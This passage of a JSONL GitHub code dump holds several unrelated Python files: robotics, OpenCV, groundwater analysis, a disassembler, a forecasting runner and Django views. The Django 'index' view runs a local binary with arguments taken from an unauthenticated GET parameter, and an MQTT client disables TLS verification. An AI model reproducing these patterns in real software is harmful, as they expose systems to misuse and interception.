\"\"\"Deposits the item into the order bin.\n \"\"\"\n name = 'DROP_OFF_ITEM'\n\n # The x,y coordinates the base should drive to for dropoffs in the order\n # bin frame\n DROPOFF_POS_BASE_X = -0.6040\n DROPOFF_POS_BASE_Y = 0.6604\n # The position the arm will move to before it lets go of the object\n DROPOFF_POS_ARM_X = 0.0872\n DROPOFF_POS_ARM_Y = -0.8277\n DROPOFF_POS_ARM_Z = 0.6577\n DROPOFF_QUAT_ARM_X = 0.0008\n DROPOFF_QUAT_ARM_Y = -0.7025\n DROPOFF_QUAT_ARM_Z = 0.0197\n DROPOFF_QUAT_ARM_W = -0.7114\n # The height the arm will start at before lowering into the bin to dropoff\n # object\n DROPOFF_POS_ARM_START_Z = 0.7477\n\n def __init__(self, **kwargs):\n smach.State.__init__(self,\n outcomes=[\n outcomes.DROP_OFF_ITEM_SUCCESS,\n outcomes.DROP_OFF_ITEM_FAILURE\n ],\n input_keys=['bin_id', 'bin_data', 'previous_item'],\n output_keys=['output_bin_data', 'previous_item']\n )\n self._tts = kwargs[\"tts\"]\n self._set_grippers = kwargs[\"set_grippers\"]\n self._drive_linear = kwargs[\"drive_linear\"]\n self._moveit_move_arm = kwargs[\"moveit_move_arm\"]\n self._move_arm_ik = kwargs[\"move_arm_ik\"]\n self._tuck_arms = kwargs[\"tuck_arms\"]\n self._markers = kwargs[\"markers\"]\n self._drive_to_pose = kwargs[\"drive_to_pose\"]\n self._tf_listener = kwargs[\"tf_listener\"]\n\n\n @handle_service_exceptions(outcomes.DROP_OFF_ITEM_FAILURE)\n def execute(self, userdata): \n\n # open gripper\n raw_input(\"Press enter to release item\")\n rospy.loginfo('Open gripper')\n self._set_grippers.wait_for_service()\n time.sleep(5)\n open_gripper_success = self._set_grippers(True, True, -1)\n rospy.loginfo(open_gripper_success)\n\n\n # get back to \"untucked\" position\n rospy.loginfo('Untucking right arm')\n self._tuck_arms.wait_for_service()\n retucked_success = self._tuck_arms(tuck_left=False, tuck_right=False)\n rospy.loginfo(retucked_success)\n\n return outcomes.DROP_OFF_ITEM_SUCCESS\n","repo_name":"hcrlab/push_pull","sub_path":"pr2_pick_main/scripts/states/DropOffItem.py","file_name":"DropOffItem.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74008832871","text":"import cv2\nimport numpy as np\nimport cv2.cv as cv\nimg = cv2.imread('image.png')\nimg = cv2.medianBlur(img,5)\n\ncontours,hierarchy = cv2.findContours(img, 1, 2)\n\ncnt = contours[0]\n(x,y),radius = cv2.minEnclosingCircle(cnt)\ncenter = (int(x),int(y))\nradius = int(radius)\nimg = cv2.circle(img,center,radius,(0,255,0),2)\n\ncv2.imshow('detected circles',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"techalien/xestos","sub_path":"Haar cascade method/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40915983289","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport os\nimport sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nsys.path.append(r'D:/TreasureValley/vadose/WaterLevelProc')\nfrom WaterlevelTools import filterData, getWLalt, normscore\n\nVROOT = r'D:/TreasureValley/vadose'\n\n#---------------------------\n# Import nullset of TV wells, Data and site info\n# ---------------------------\nf = os.path.join(VROOT, 'data/groundwater/null/WellInfo_null.csv')\n#Read Wellsite\nWellsNull = pd.read_csv(f,\n header=0,\n infer_datetime_format=True, parse_dates=True,\n index_col='WellNumber')\nif os.path.isfile(os.path.join(VROOT,'data/groundwater/null/WellLevels_null.pkl')):\n DataNull = pd.read_pickle(os.path.join(VROOT,'data/null/WellLevels_null.pkl'))\n DataNull[['StatusName','MethodName','AgencyName']] = DataNull[['StatusName', 'MethodName', 'AgencyName']].astype(str)\n DataNull.index = DataNull.pop('MeasurementDate')\n #DataNull = DataNull.unstack( level = 0)\n #df = df.resample('D').mean()\n #df = df[df.notnull().any(axis=1)]\nelse:\n print('Pickle file does not exist. Create nullset pickle file to speed up reading')\n \n# ---------------------------------------------------------------------------\n# Define a dictionary of 'scenarios' or conditions for selecting wells\n# ------------------------------------------------------------------------\n\nscenarios = [{'description': 'Median1986_2018',\n 'minrec' : 5, \n 'date_start' : pd.datetime(1980,1,1),\n 'date_end' : pd.datetime(2018,1,1),\n 'data' : (),\n 'maxdepth' : 200},\n \n {'description' : 'WinterWY2016',\n 'minrec' : 1,\n 'date_start' : pd.datetime(2015,11,1),\n 'date_end' : pd.datetime(2016,4,1),\n 'data' : (),\n 'maxdepth' : 200 } ,\n \n {'description' : 'null',\n 'minrec' : 1,\n 'date_start' : pd.datetime(1910,1,1),\n 'date_end' : pd.datetime(2018,12,1),\n 'data' : (),\n 'maxdepth' : 1000}\n ]\n# Populate well data\nwldata = [filterData(s,DataNull, WellsNull) for i,s in enumerate(scenarios)]\nwldata = [getWLalt( df ) for df in wldata]\nwldata = [normscore(df,['DTWmed','ALTdtw'])[0] for df in wldata]\nfor i, df in enumerate(wldata):\n scenarios[i]['data'] = df\n#Attempt to populate with dictionary/list comprehension\n#data = [ {key: filterData(s,DataNull) for key,val in s.items() if key == 'data' } for s in scenarios]\n\n\n#-------------------------------------\n# Export some files\nimport pickle\n\n# Make directories for data \n[os.mkdir(os.path.join(VROOT,'data/groundwater',s['description'])) \nfor s in scenarios \nif not os.path.isdir(os.path.join(VROOT,'data/groundwater',s['description']))]\n\nfor s in scenarios:\n fdir = os.path.join(VROOT,r'data/groundwater',s['description'])\n with open( fdir + '\\\\' + s['description'] + '.pkl','wb') as handle:\n pickle.dump(s ,handle)\n\ngeoeas=False\nshapef = False\nif geoeas:\n dfout = wldata[0].filter(regex='IDTM|DTW|dtw')\n toGEOEAS(dfout.replace(np.nan,-999), r'D:/TreasureValley/vadose/data/groundwater/WL_all2.dat','Water level, 1980-present')\n \nelif shapef:\n# ---------- Export to shapefile\n from shapely.geometry import Point\n import geopandas\n # Name and directory creation\n SiteInfo = scenarios[0]['data']\n desc = scenarios[0]['description']\n f = 'TV_watertable_{}.shp'.format(desc)\n fdir = os.path.join(VROOT,'data',desc)\n if not os.path.isdir(fdir):\n os.mkdir(fdir)\n # Geospatial\n SiteInfo['geometry'] = SiteInfo.apply(lambda x: Point((float(x.XIDTM), float(x.YIDTM), float(x.ALTdtw))),axis=1)\n proj4str = '+proj=tmerc +lat_0=42 +lon_0=-114 +k=0.9996 +x_0=2500000 +y_0=1200000 +datum=nad83 +ellps=GRS80 +units=m +no_defs'\n SiteInfoGeo = geopandas.GeoDataFrame(SiteInfo,geometry='geometry',crs = proj4str)\n SiteInfoGeo.loc[:,~SiteInfoGeo.columns.str.contains('Date')].to_file(\n os.path.join(fdir,f),driver='ESRI Shapefile')\n\n\n#------Various Data Description queries\n# 753 Wells in study area\n# Wells without depth or opening data\nWellsNull.filter(regex='TotalDepth|Opening').isnull().all(axis=1).sum()\n# Wells deeper than 200 ft\n((WellsNull['TotalDepth'] > 200) | (WellsNull['OpeningMin'] > 200)).sum()","repo_name":"alemood/TreasureValley","sub_path":"vadose/WaterLevelProc/AnalyzeVadoseZone.py","file_name":"AnalyzeVadoseZone.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28195158987","text":"\"\"\"Instruction type definitions.\"\"\"\n\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING, ClassVar, Sequence, Type, TypeVar\n\nfrom k0s_dasm.flow import Forward as FlowForward\nfrom k0s_dasm.util import fmthex\n\nif TYPE_CHECKING:\n\tfrom k0s_dasm.base import Field, Flow, Operand, Program\n\n\n_T = TypeVar(\"_T\", bound=\"Instruction\")\n\n\n@dataclass\nclass Instruction:\n\t\"\"\"\n\tDefinition of a 78K/0S instruction mnemonic and its encoding.\n\n\tThere should be one definition (subclass) for each row in the\n\t\"instruction code list\" from the manual.\n\n\tInstruction words are in BIG ENDIAN for consistent reading with the list\n\tin the datasheet, but data words are generally in little endian.\n\t\"\"\"\n\n\tmnemonic: ClassVar[str] = NotImplemented\n\t\"\"\"\n\tClass constant: text representation of the instruction format.\n\n\tThis is in the abstract case, with the names of the operands instead\n\tof the actual values for an instance of the instruction.\n\t\"\"\"\n\n\tmatch: ClassVar[int] = NotImplemented\n\t\"\"\"\n\tClass constant: bits consumed by the instruction.\n\n\tProgram data must match exactly when masked with mmask.\n\t\"\"\"\n\n\tmmask: ClassVar[int] = NotImplemented\n\t\"\"\"Class constant: mask applied to match and data when finding instructions.\"\"\"\n\n\tbytecount: ClassVar[int] = NotImplemented\n\t\"\"\"Class constant: instruction byte count.\"\"\"\n\n\tfield_defs: ClassVar[Sequence[\"Field\"]] = tuple()\n\t\"\"\"Class constant: tuple of Field instances for instruction fields.\"\"\"\n\n\tflow: ClassVar[\"Flow\"] = FlowForward()\n\t\"\"\"Class constant: instruction flow type.\"\"\"\n\n\tformat: ClassVar[str] = NotImplemented\n\t\"\"\"\n\tClass constant: format string with entries for operands.\n\n\tThe format things (i.e. {0}, {1}) will be filled in with the string from\n\trendering that operand, with indices per ``field_defs``.\n\t\"\"\"\n\n\tword: int\n\t\"\"\"Raw instruction word (8-32 bits).\"\"\"\n\n\tpc: int\n\t\"\"\"Address of (the first byte of) this instruction.\"\"\"\n\n\tnext: Sequence[int]\n\t\"\"\"\n\tAddress(es) of the next instruction(s).\n\n\tIn general this is the next sequential instruction in the program. But, if\n\tit's a branch instruction, it will be something different. If it's a\n\tconditional branch, there would be multiple next addresses. If the next\n\taddress is calculated at runtime, then this field may be empty (requiring\n\tmanual intervention).\n\t\"\"\"\n\n\toperands: dict[\"Field\", \"Operand\"]\n\t\"\"\"\n\tOperand values for each defined Field.\n\n\tPreferred order is as per ``field_defs``.\n\t\"\"\"\n\n\tprogram: \"Program\"\n\t\"\"\"The containing Program.\"\"\"\n\n\tnotes: list[str] = field(default_factory=list)\n\t\"\"\"Notes or warnings from analysis.\"\"\"\n\n\t@classmethod\n\tdef load(cls: Type[_T], program: \"Program\", pc: int) -> _T | None:\n\t\t\"\"\"\n\t\tAttempt to match some program data to this instruction def.\n\n\t\tIf no start address is provided, the PC in the Program is used, and\n\t\tthen updated according to the actual word length. If a start address\n\t\tis provided, the Program's PC is ignored and not updated.\n\t\t\"\"\"\n\t\tpc_next = pc + cls.bytecount\n\t\tdata = program.flash[pc:pc_next]\n\n\t\tif len(data) < cls.bytecount:\n\t\t\treturn None\n\t\tword = int.from_bytes(data[: cls.bytecount], byteorder=\"big\", signed=False)\n\t\tif (word & cls.mmask) != (cls.match & cls.mmask):\n\t\t\treturn None\n\t\t# else, matched.\n\n\t\tfields: dict[Field, Operand] = {}\n\t\tout = cls(\n\t\t\tword=word,\n\t\t\tpc=pc,\n\t\t\tnext=tuple(),\n\t\t\toperands=fields,\n\t\t\tprogram=program,\n\t\t)\n\n\t\tfor fdef in cls.field_defs:\n\t\t\tfields[fdef] = fdef.from_inst_word(word, out)\n\t\tout.next = out.flow.next(out)\n\t\tif not out._check_fields():\n\t\t\treturn None\n\n\t\treturn out\n\n\t# noinspection PyMethodMayBeStatic\n\tdef _check_fields(self) -> bool:\n\t\t\"\"\"\n\t\tCheck if field values are allowed for this definition.\n\n\t\tCalled as part of the match/load process, if False, the match fails.\n\t\t\"\"\"\n\t\treturn True\n\n\t@staticmethod\n\tdef autoload(program: \"Program\", pc: int) -> \"Instruction\":\n\t\t\"\"\"Attempt to match some program data to any instruction subclass.\"\"\"\n\t\ttry:\n\t\t\t# defs live here\n\t\t\timport k0s_dasm.instr # noqa\n\t\texcept ImportError:\n\t\t\tpass\n\n\t\tresults: list[Instruction] = []\n\t\tfor cls in Instruction.__subclasses__():\n\t\t\tif cls.mnemonic is NotImplemented or cls.match is NotImplemented:\n\t\t\t\tcontinue # intermediate class\n\t\t\tresult = cls.load(program, pc)\n\t\t\tif result is not None:\n\t\t\t\tresults.append(result)\n\n\t\tdebug_data = program.flash[pc : pc + 4]\n\t\tif len(results) == 0:\n\t\t\traise ValueError(\n\t\t\t\tf\"Could not match instruction data: {fmthex(debug_data)} ...\"\n\t\t\t)\n\t\telif len(results) > 1:\n\t\t\tdebug = \"\\n\\t\".join([result.render() for result in results])\n\t\t\traise RuntimeError(\n\t\t\t\t\"Multiple matches for instruction data! \"\n\t\t\t\tf\"[ {fmthex(debug_data)} ... ] -> \\n\\t{debug}\"\n\t\t\t)\n\n\t\telse:\n\t\t\tresult = results[0]\n\t\t\treturn result\n\n\tdef render(self) -> str:\n\t\t\"\"\"Render instruction mnemonic with field values.\"\"\"\n\t\tren_fields: list[str] = []\n\t\tfor fdef in self.field_defs:\n\t\t\tren_fields.append(self.operands[fdef].render())\n\t\treturn self.format.format(*ren_fields)\n","repo_name":"pixelfelon/78k0s-dasm","sub_path":"k0s_dasm/ibase.py","file_name":"ibase.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41047053629","text":"import math\nfrom typing import Tuple, Union, Optional\nimport torch\nfrom torch import nn\nimport numpy as np\nfrom basicts.runners.base_runner import BaseRunner\nfrom basicts.utils.registry import SCALER_REGISTRY\nfrom basicts.utils.serialization import load_pkl\nfrom easytorch.utils.dist import master_only\n\n\"\"\"\nRunner for traffic datasets~(short-term forecasting datasets).\n- support curriculum learning.\n- metrics:\n - MAE\n - RMSE\n - MAPE\n- evluate at horizon 3, 6, 12, and overall.\n- users must have to implement the `forward` function. \n\"\"\"\n\nclass TrafficRunner(BaseRunner):\n \"\"\"runner for traffic datasets: metr-la, pems-bay, pems03, pems04, pems07, pems08.\n details:\n - initialize metrics: mae, mape, rmse\n - define model\n - build datasets & dataloader\n - self.iter_per_epoch\n - train/val iteration, test process.\n Args:\n BaseRunner (easytorch.easytorch.runner): base runner\n \"\"\"\n def __init__(self, cfg: dict):\n super().__init__(cfg)\n\n self.dataset_name = cfg['DATASET_NAME']\n self.null_val = cfg['TRAIN'].get('NULL_VAL', np.nan) # different datasets have different null_values. For example, 0.0 in traffic speed dataset, nan in traffic flow dataset.\n self.dataset_type = cfg['DATASET_TYPE']\n self.forward_features = cfg['MODEL'].get('FROWARD_FEATURES', None)\n self.target_features = cfg['MODEL'].get('TARGET_FEATURES', None)\n\n # read scaler for re-normalization\n self.scaler = load_pkl(\"datasets/\" + self.dataset_name + \"/scaler.pkl\")\n # define loss\n self.loss = cfg['TRAIN']['LOSS']\n # define metric\n self.metrics = cfg['METRICS'] \n # curriculum learning for output. Note that this is different from the CL in Seq2Seq archs.\n self.cl_param = cfg.TRAIN.get('CL', None)\n if self.cl_param is not None:\n self.warm_up_epochs = cfg.TRAIN.CL.get('WARM_EPOCHS', 0)\n self.cl_epochs = cfg.TRAIN.CL.get('CL_EPOCHS')\n self.prediction_length = cfg.TRAIN.CL.get('PREDICTION_LENGTH')\n\n def init_training(self, cfg: dict):\n \"\"\"Initialize training.\n\n Including loss, training meters, etc.\n\n Args:\n cfg (dict): config\n \"\"\"\n super().init_training(cfg)\n for key, value in self.metrics.items():\n self.register_epoch_meter(\"train_\"+key, 'train', '{:.4f}')\n\n def init_validation(self, cfg: dict):\n \"\"\"Initialize validation.\n\n Including validation meters, etc.\n\n Args:\n cfg (dict): config\n \"\"\"\n super().init_validation(cfg)\n for key, value in self.metrics.items():\n self.register_epoch_meter(\"val_\"+key, 'val', '{:.4f}')\n\n def init_test(self, cfg: dict):\n \"\"\"Initialize test.\n\n Including test meters, etc.\n\n Args:\n cfg (dict): config\n \"\"\"\n\n super().init_test(cfg)\n for key, value in self.metrics.items():\n self.register_epoch_meter(\"test_\"+key, 'test', '{:.4f}')\n\n @staticmethod\n def define_model(cfg: dict) -> nn.Module:\n \"\"\"Define model.\n\n If you have multiple models, insert the name and class into the dict below,\n and select it through ```config```.\n\n Args:\n cfg (dict): config\n\n Returns:\n model (nn.Module)\n \"\"\"\n return cfg['MODEL']['ARCH'](**cfg.MODEL.PARAM)\n\n def build_train_dataset(self, cfg: dict):\n \"\"\"Build MNIST train dataset\n\n Args:\n cfg (dict): config\n\n Returns:\n train dataset (Dataset)\n \"\"\"\n raw_file_path = cfg[\"TRAIN\"][\"DATA\"][\"DIR\"] + \"/data.pkl\"\n index_file_path = cfg[\"TRAIN\"][\"DATA\"][\"DIR\"] + \"/index.pkl\"\n batch_size = cfg['TRAIN']['DATA']['BATCH_SIZE']\n dataset = cfg['DATASET_CLS'](raw_file_path, index_file_path, mode='train')\n print(\"train len: {0}\".format(len(dataset)))\n \n self.iter_per_epoch = math.ceil(len(dataset) / batch_size)\n \n return dataset\n\n @staticmethod\n def build_val_dataset(cfg: dict):\n \"\"\"Build MNIST val dataset\n\n Args:\n cfg (dict): config\n\n Returns:\n train dataset (Dataset)\n \"\"\"\n raw_file_path = cfg[\"VAL\"][\"DATA\"][\"DIR\"] + \"/data.pkl\"\n index_file_path = cfg[\"VAL\"][\"DATA\"][\"DIR\"] + \"/index.pkl\"\n dataset = cfg['DATASET_CLS'](raw_file_path, index_file_path, mode='valid')\n print(\"val len: {0}\".format(len(dataset)))\n return dataset\n\n @staticmethod\n def build_test_dataset(cfg: dict):\n \"\"\"Build MNIST val dataset\n\n Args:\n cfg (dict): config\n\n Returns:\n train dataset (Dataset)\n \"\"\"\n raw_file_path = cfg[\"TEST\"][\"DATA\"][\"DIR\"] + \"/data.pkl\"\n index_file_path = cfg[\"TEST\"][\"DATA\"][\"DIR\"] + \"/index.pkl\"\n dataset = cfg['DATASET_CLS'](raw_file_path, index_file_path, mode='test')\n print(\"test len: {0}\".format(len(dataset)))\n return dataset\n\n def curriculum_learning(self, epoch: int = None) -> int:\n \"\"\"calculate task level in curriculum learning.\n\n Args:\n epoch (int, optional): current epoch if in training process, else None. Defaults to None.\n\n Returns:\n int: task level\n \"\"\"\n if epoch is None:\n return self.prediction_length\n epoch -= 1\n # generate curriculum length\n if epoch < self.warm_up_epochs:\n # still warm up\n cl_length = self.prediction_length\n else:\n _ = (epoch - self.warm_up_epochs) // self.cl_epochs + 1\n cl_length = min(_, self.prediction_length)\n return cl_length\n\n def forward(self, data: tuple, epoch:int = None, iter_num: int = None, train:bool = True, **kwargs) -> tuple:\n \"\"\"feed forward process for train, val, and test. Note that the outputs are NOT re-scaled.\n\n Args:\n data (tuple): data (future data, history data). [B, L, N, C] for each of them\n epoch (int, optional): epoch number. Defaults to None.\n iter_num (int, optional): iteration number. Defaults to None.\n train (bool, optional): if in the training process. Defaults to True.\n\n Returns:\n tuple: (prediction, real_value). [B, L, N, C] for each of them.\n \"\"\"\n raise NotImplementedError()\n\n def train_iters(self, data: Union[torch.Tensor, Tuple], epoch: int, iter_index: int) -> torch.Tensor:\n \"\"\"Training details.\n\n Args:\n data (Union[torch.Tensor, Tuple]): Data provided by DataLoader\n epoch (int): current epoch.\n iter_index (int): current iter.\n\n Returns:\n loss (torch.Tensor)\n \"\"\"\n iter_num = (epoch-1) * self.iter_per_epoch + iter_index\n prediction, real_value = self.forward(data=data, epoch=epoch, iter_num=iter_num, train=True)\n # re-scale data\n prediction = SCALER_REGISTRY.get(self.scaler['func'])(prediction, **self.scaler['args'])\n real_value = SCALER_REGISTRY.get(self.scaler['func'])(real_value, **self.scaler['args'])\n # loss\n if self.cl_param:\n cl_length = self.curriculum_learning(epoch=epoch)\n loss = self.loss(prediction[:, :cl_length, :, :], real_value[:, :cl_length, :, :], null_val=self.null_val)\n else:\n loss = self.loss(prediction, real_value, null_val=self.null_val)\n # metrics\n for metric_name, metric_func in self.metrics.items():\n metric_item = metric_func(prediction, real_value, null_val=self.null_val)\n self.update_epoch_meter('train_'+metric_name, metric_item.item())\n return loss\n\n def val_iters(self, data: Union[torch.Tensor, Tuple], train_epoch: int, iter_index: int):\n \"\"\"Validation details.\n\n Args:\n data (Union[torch.Tensor, Tuple]): Data provided by DataLoader\n train_epoch (int): current epoch if in training process. Else None.\n iter_index (int): current iter.\n \"\"\"\n prediction, real_value = self.forward(data=data, epoch=train_epoch, iter_num=None, train=False)\n # re-scale data\n prediction = SCALER_REGISTRY.get(self.scaler['func'])(prediction, **self.scaler['args'])\n real_value = SCALER_REGISTRY.get(self.scaler['func'])(real_value, **self.scaler['args'])\n # loss\n mae = self.loss(prediction, real_value, null_val=self.null_val)\n # metrics\n for metric_name, metric_func in self.metrics.items():\n metric_item = metric_func(prediction, real_value, null_val=self.null_val)\n self.update_epoch_meter('val_'+metric_name, metric_item.item())\n\n @torch.no_grad()\n @master_only\n def test(self, train_epoch: int = None):\n \"\"\"test model.\n\n Args:\n train_epoch (int, optional): current epoch if in training process.\n \"\"\"\n # test loop\n prediction = []\n real_value = []\n for iter_index, data in enumerate(self.test_data_loader):\n preds, testy = self.forward(data, epoch=train_epoch, iter_num=None, train=False)\n prediction.append(preds)\n real_value.append(testy)\n prediction = torch.cat(prediction,dim=0)\n real_value = torch.cat(real_value, dim=0)\n # re-scale data\n prediction = SCALER_REGISTRY.get(self.scaler['func'])(prediction, **self.scaler['args'])\n real_value = SCALER_REGISTRY.get(self.scaler['func'])(real_value, **self.scaler['args'])\n # summarize the results.\n ## test performance of different horizon\n for i in range(12):\n # For horizon i, only calculate the metrics **at that time** slice here.\n pred = prediction[:,i,:,:]\n real = real_value[:,i,:,:]\n # metrics\n metric_results = {}\n for metric_name, metric_func in self.metrics.items():\n metric_item = metric_func(pred, real, null_val=self.null_val)\n metric_results[metric_name] = metric_item.item()\n log = 'Evaluate best model on test data for horizon {:d}, Test MAE: {:.4f}, Test RMSE: {:.4f}, Test MAPE: {:.4f}'\n log = log.format(i+1, metric_results['MAE'], metric_results['RMSE'], metric_results['MAPE'])\n self.logger.info(log)\n ## test performance overall\n for metric_name, metric_func in self.metrics.items():\n metric_item = metric_func(prediction, real_value, null_val=self.null_val)\n self.update_epoch_meter('test_'+metric_name, metric_item.item())\n metric_results[metric_name] = metric_item.item()\n\n @master_only\n def on_validating_end(self, train_epoch: Optional[int]):\n \"\"\"Callback at the end of validating.\n\n Args:\n train_epoch (Optional[int]): current epoch if in training process.\n \"\"\"\n if train_epoch is not None:\n self.save_best_model(train_epoch, 'val_MAE', greater_best=False)\n","repo_name":"zhoujiajuly/copy-basicTS","sub_path":"basicts/runners/base_traffic_runner.py","file_name":"base_traffic_runner.py","file_ext":"py","file_size_in_byte":11125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42739267975","text":"import urllib3\nfrom utils.GenUtils import read_lines, write_lines\nimport time\nfrom tqdm import tqdm\n\nlink_file = '/Users/sravan/Spotify.txt'\noutfile = '/Users/sravan/SpotifyLinkData.txt'\nsong_links = read_lines(link_file)\n\nhttp = urllib3.PoolManager()\nfin_lines = list()\n\nfor each_link in tqdm(song_links):\n try:\n r = http.request('GET', each_link)\n data = r.data\n data_s = data.decode()\n fin_lines.append(data_s)\n except Exception as e:\n print(each_link)\n print(e.__str__())\n print('\\n====\\n\\n=====\\n')\n\n time.sleep(1)\n\nwrite_lines(fin_lines, outfile)\n","repo_name":"gsravank/ds_algo","sub_path":"problems/adhoc/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16285202638","text":"import datetime\nimport json\nimport os\nimport time\n\nimport cv2\nimport numpy as np\nimport paho.mqtt.client as mqtt\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nGREEN_START = 65\nGREEN_END = 70\n\nRED_START = 175\nRED_END = 180\n\n\ndef resize_small(image):\n return cv2.resize(\n image, dsize=(0, 0), fx=0.2, fy=0.2, interpolation=cv2.INTER_LINEAR\n )\n\n\ndef extract_rough_led_image(image, h_start, h_end):\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n h, _, _ = cv2.split(hsv)\n\n h = cv2.inRange(h, h_start, h_end)\n\n masked_image = cv2.bitwise_and(hsv, hsv, mask=h)\n\n return cv2.cvtColor(masked_image, cv2.COLOR_BGR2GRAY)\n\n\ndef clean_image(image):\n kernel = np.ones((20, 20), np.uint8)\n\n return cv2.morphologyEx(image, cv2.MORPH_OPEN, kernel)\n\n\ndef find_led_lamps(image):\n _, bin_img = cv2.threshold(image, 20, 255, cv2.THRESH_BINARY)\n contours, hierarchy = cv2.findContours(\n bin_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE\n )\n\n return contours, hierarchy, bin_img\n\n\ndef post_sensing_value(sensing_value):\n body = json.dumps(\n {\n \"sensor_id\": \"boiler001\",\n \"sensing_value\": sensing_value,\n \"timestamp\": int(time.mktime(datetime.datetime.now().timetuple())),\n }\n )\n\n client = mqtt.Client()\n client.username_pw_set(os.getenv(\"MQTT_USER\"), password=os.getenv(\"MQTT_PASSWORD\"))\n client.tls_set(tls_version=mqtt.ssl.PROTOCOL_TLSv1_2, ciphers=None)\n client.tls_insecure_set(True)\n client.connect(os.getenv(\"MQTT_BROKER_HOST\"), 8883)\n client.publish(os.getenv(\"MQTT_TOPIC\"), body)\n client.disconnect()\n\n\ndef detect_light(image, h_start, h_end):\n rough_img = extract_rough_led_image(image, h_start, h_end)\n clean_img = clean_image(rough_img)\n contours, _, _ = find_led_lamps(clean_img)\n\n return contours\n\n\ndef pick_led(cap):\n while True:\n _, frame = cap.read()\n\n green_contours = detect_light(frame, GREEN_START, GREEN_END)\n red_contours = detect_light(frame, RED_START, RED_END)\n\n if len(green_contours) > 0:\n print(\"Green is detected.\")\n post_sensing_value(\"green\")\n elif len(red_contours) > 0:\n print(\"Red is detected.\")\n post_sensing_value(\"red\")\n elif len(green_contours) <= 0 and len(red_contours) <= 0:\n print(\"Nothing is detected.\")\n else:\n print(\"Both is detected.\")\n\n time.sleep(30)\n\n\ndef testing_sample_img(frame):\n green_contours = detect_light(frame, GREEN_START, GREEN_END)\n red_contours = detect_light(frame, RED_START, RED_END)\n\n if len(green_contours) > 0:\n print(\"Green is detected.\")\n post_sensing_value(\"green\")\n elif len(red_contours) > 0:\n print(\"Red is detected.\")\n post_sensing_value(\"red\")\n elif len(green_contours) <= 0 and len(red_contours) <= 0:\n print(\"Nothing is detected.\")\n else:\n print(\"Both are detected.\")\n\n\ndef main():\n cap = cv2.VideoCapture(0)\n time.sleep(3)\n\n pick_led(cap)\n\n'''\nMEMO: \nYou can try LED detection with sample images (green and red LED).\nPlease uncomment the following main function if you want to try it.\n'''\n# def main():\n# frame = cv2.imread(\"./img/green_led.jpg\", cv2.IMREAD_COLOR)\n# testing_sample_img(frame)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fujitake/smart-building-quick-start-kit","sub_path":"devices/analog-meter-readers/led-meter/led_status_observer.py","file_name":"led_status_observer.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12502731858","text":"from django.http import JsonResponse\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.views import TokenObtainPairView\n\nfrom .serializers import NoteSerializer\nfrom base.models import Note\n\nimport subprocess\nfrom dotenv import load_dotenv, dotenv_values\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n\n # Add custom claims\n token['username'] = user.username # encrypted\n\n return token\n\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n@api_view(['GET'])\ndef getRoutes(request):\n routes = [\n '/api/token',\n '/api/token/refresh',\n '/api/query'\n ]\n return Response(routes)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getNotes(request):\n user = request.user\n notes = user.note_set.all()\n serializer = NoteSerializer(notes, many=True)\n return Response(serializer.data)\n\ndef index(request):\n cmd = \"/home/website/backend/base/api/token_erc_20 \" + request.GET.get('cmd')\n env = dotenv_values(\"/home/website/backend/base/api/env/.env.org1.minter\")\n print(cmd.split(\" \"))\n res = subprocess.run(cmd.split(\" \"), env=env, capture_output=True)\n output = res.stdout.decode().split(\"***\")\n transaction, result = output[0].strip(\"-> \").rsplit(\".\", 1)[0], \"\"\n if (res.stderr.decode() == \"\"):\n result = output[1].strip().replace(\"Result: \", \"\")\n return JsonResponse({\"action\": transaction.split(\" \")[0], \"transaction\": transaction.split(\" \")[2], \"result\": result, 'error_msg': res.stderr.decode()})","repo_name":"daironghan/django-react-auth","sub_path":"backend/base/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20733284504","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nfrom scipy import signal\n\n\nspacing=0.001\ndef grid(min, max, gridpoints):\n grid = np.linspace(min, max, gridpoints, dtype=np.complex_)\n return grid\n\ndef wavefunc(grid, func, *args):\n func_vec = np.vectorize(func)\n return func_vec(grid, *args)+0j\n\ndef potential(grid, func):\n func_vec = np.vectorize(func)\n return func_vec(grid)+0j\n\ndef timegrid(max, spacing):\n timegrid = np.arange(0, max, spacing)\n return timegrid\n\ndef solver(psi_0, V):\n psi_0_l = np.roll(psi_0,1)\n psi_0_u = np.roll(psi_0,-1)\n 